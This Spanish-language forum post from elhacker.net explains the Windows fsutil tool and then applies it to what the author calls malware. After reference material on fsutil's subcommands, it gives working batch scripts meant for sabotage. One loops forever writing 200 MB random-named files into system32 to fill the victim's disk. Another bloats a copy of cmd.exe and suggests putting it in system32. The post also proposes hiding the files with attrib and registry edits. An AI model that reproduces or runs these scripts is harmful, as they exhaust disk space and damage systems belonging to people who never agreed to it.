elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Aporte by 4ng3r] Fsutil con Aplicacion en Malware by 4ng3r		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Aporte by 4ng3r] Fsutil con Aplicacion en Malware by 4ng3r  (Leído 1,812 veces)
AFelipeTrujillo

Desconectado Desconectado

Mensajes: 160



Ver Perfil WWW
[Aporte by 4ng3r] Fsutil con Aplicacion en Malware by 4ng3r
« en: 23 Febrero 2010, 17:17 pm »
Hola gente, hoy les voy a presentar un comando bastante raro muy poco conocido es el Fsutil, primero la definición, sus parametros y después la aplicación

FSUTIL (FileSUTILities), es una herramienta para la consola de comandos, la cual nos permitira hacer gran variedad de tareas sobre los sistemas de archivos de la familia de sistemas operativos de windows (FAT) y NTFS, como administrar puntos de análisis, administrar archivos dispersos o desmontar un volumen.
Para lanzarlo, deberemos tener las credenciales de administrador !!! este es el problema.

En la siguiente lista podremos ver los diferentes argumentos que le podemos dar a esta herramienta y los diferentes usos que tiene.
Recalcar el uso de fsutil hardlink create, el cual nos servirá para realizar accesos directos duros a ficheros de manera que podamos usar el mismo fichero en diferentes localizaciones y con diferentes nombres pero sin duplicarlo, de manera que cuando se modifica uno, se modifican para las dos ubicaciones ya que es el mismo fichero.

Fsutil behavior

Consulta, cambia, habilita o deshabilita la configuración para generar nombres de archivo con longitud de caracteres 8.3, aceptar caracteres extendidos en los nombres de archivo con longitud de caracteres 8.3 en volúmenes NTFS, actualizar la marca de fecha y hora de último acceso en volúmenes NTFS, la frecuencia con la que se escriben sucesos de cuota en el registro de sistema, los niveles de caché interna de memoria de grupo NTFS paginada y no paginada, y la cantidad de espacio de disco reservado para la zona MFT1.

Fsutil dirty

Nos servirá para saber si se ha establecido el bit de daños del un volumen, y nos permite también establecerlo, de manera que en el siguiente reinicio, autochk buscará automáticamente los errores en el volumen.

Fsutil file

Tiene distintos parámetros:

  • findbysid - Buscar fichero por nombre de usuario, (en caso de estar habilitadas las cuotas de disco).Busca dentro de la tabla maestra de archivos (MFT) de NTFS por lo que el rendimiento es mucho mayor que realizar la búsqueda por la extructura de directorios.
Código
  1. fsutil file findbysid user c:\

  • queryallocranges - Consulta los intervalos asignados de un archivo.Es útil para determinar si un archivo tiene zonas dispersa.
Código
  1. fsutil file queryallocranges offset=1024 length=64 c:\archivo.txt
  • setshortname - Establece el nombre corto (nombre de archivo con longitud de caracteres 8.3) de un archivo en un volumen NTFS.
  • setvaliddata - Establece la longitud de datos válidos
  • setzerodata - Establece los datos cero para un archivo.
  • createnew - Crea un fichero con tamaño especifico (contenido 0)
  • Fsutil fsinfo
    • drives - Enumera todas las unidades.
    • drivetype - Consulta el tipo de unidad.
    • volumeninfo - Consulta la información del volumen.
    • ntfsinfo – Consulta la información de volumen específica de NTFS.
    • statistics – Consulta las estadísticas del sistema de archivos.

Estos son los comandos mas importantes según mi parecer, la idea es seguir con la aplicación de este comando en algún malware que se les ocurra. Si se fijan bien el comandos Fsutil file createnew, sirve para crear un archivo de longitud 0 (cero) pero esto no estan cierto; este comando a demas de crear un archivo puede modificar su tamaño según este Script:

Código
  1. @echo off
  2. echo "Ecriba el Nombre del Archivo"
  3. set /p nom=
  4. echo "Ecriba el tamanno de %nom% en megabyte"
  5. set /p var=
  6. set /a length= %var%*1000000
  7. :: ~~~~~~ RUTINA FSUTIL ~~~~~~~~
  8. fsutil file createnew %nom%.txt %length%

Se imagina esto:

Código
  1. fsutil file createnew fhaker.txt 99999999999999

Es aquí donde podemos observarla potencia de este comando, poder crear archivos con la longitud que queramos en bytes es bastante útil a la hora de sabotear un sistema de información. La desventaja de este comando es que un usuario con experiencia pondría en la labor ponerse a buscar archivo por archivo y lo borraría muy fácilmente este archivo; una solución a este inconveniente es crear varios archivos y distribuirlos por todo el sistema, buena idea pero existe otro problema «no conocemos el tamaño del disco del usuario !!!” . Asi que llenar el disco con uno o cuatro archivo sno es viable lo mejor es llenarlo con miles de archivos, yo propongo esta solución:

Código
  1. @echo off
  2. REM NO INTENTEN ESTO EN SU PC
  3. REM Vamo a crear archivos a punta de numeros
  4. REM Randomicos, como putas!! con %RANDOM%
  5. REM y cada nuero seria un archivo txt de 200 Mb
  6. REm Esto ira en un ciclo infinito
  7. title +++ 4ng3r Malware Fsutil +++
  8. :start
  9. REM Esto nos lleva a la carpeta del catalogo
  10. REM del Sistema Opertativo en muchos casos
  11. REm c:\windows
  12. cd %windir%\system32
  13. set /a length= 200*1000000
  14. fsutil file createnew %random%.txt %length%
  15. goto start

Este se puede potenciar mas aun con el comando at, attrib y cierto .REG para cambiar el Hidden”=dword:00000001 ( ;D) de registro. La idea es ocultar el archivo por que nos dejaría en desventaja con el usuario la funcionalidad de nuestro malware fracasaría y simplemente nos quedaría de lección, pero se me ha ocurrido una idea aun mas loca y destructivo; no se si se estaran pensado en sobre escribir un archivo ???…. si es asi esa es la solución final a nuestro problema, simplemente buscamos un archivo vital para el sistema y le metemos peso a esa monda, entonces el usuario borrara el archivo por ahorrarse algunos bytes en su pc. Esta es la aplicación final que doy para este tema:

Código
  1. @echo off
  2. REM Copiamos CMD.EXE de system32 y lo pasamos a el
  3. REM disco donde esta instalado Windows
  4. copy %windir%\system32\cmd.exe %homedrive%\cmd1.exe
  5. REm Si vamos, ejecutamos y observamos el rendimiento
  6. REM de CMD1.EXE no ha cambiado del original trabaja igual
  7. cd %homedrive%
  8. REM Creamos el archivo
  9. fsutil file createnew ang3cmd.exe 1000000
  10. REM Y hacemos una parametrización de bytes
  11. type cmd1.exe > cmd2.exe
  12. type ang3rcmd.exe >> cmd2.exe
  13. cls
  14. echo "Se termino el Proceso"

Miremos el resultado:


Observemos que cmd1.exe es una copia de cmd.exe (el original) y en la parte de abajo vemos el cmd2.exe ya modificado por el malware, si ejecutamos cmd2.exe fuanciona como debe  ser simplemente re-nombrelo y lo copian a %systemroot%\system32.


FUENTE
En línea
C0mUnidAd C0dif|cad4.C0M
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[Aporte] Mejora la seguridad de tu aplicacion .Net
.NET (C#, VB.NET, ASP) 		.:Weeds:. 4 3,742 Último mensaje 9 Enero 2011, 21:31 pm
por .:Weeds:.
Aplicación Localidades México Django (Aporte)
Desarrollo Web 		_teiki 0 1,806 Último mensaje 25 Mayo 2012, 21:05 pm
por _teiki
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines